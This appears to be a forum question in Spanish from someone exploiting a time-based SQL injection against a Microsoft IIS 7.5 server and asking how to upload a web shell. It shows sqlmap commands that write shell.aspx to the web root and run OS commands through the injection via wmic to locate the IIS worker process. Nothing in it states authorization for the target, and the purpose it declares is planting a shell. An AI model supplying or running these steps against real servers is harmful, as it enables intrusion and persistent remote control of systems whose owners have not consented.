Estoy tratando con un SQLi basado en el tiempo en un servidor Microsoft IIS 7.5 y quiero cargar un shell.
Mi enfoque es obtener la ruta interna de la aplicación y luego intentar cargar un archivo con sqlmap --file-write "shell.aspx" --file-dest "C:/<The Web APP Path>" .
Estoy intentando obtener la ruta con - >
sqlmap -u <url> --random-agent --no-escape --dbms=mssql --time-sec=9 --os-cmd="wmic process where name='w3wp.exe' get ExecutablePath
Pero recibo la respuesta:
No instances ,
para que me haga pensar que el proceso de IIS no se está ejecutando allí, ya que w3wp.exe es el nombre del proceso de IIS. Eso me hubiera dado la ruta ejecutable, aunque no la ruta de la aplicación, no sé cómo obtenerla.
¿Cómo aprovecharía este escenario y cargaría un shell con éxito? (Soy DBA por cierto)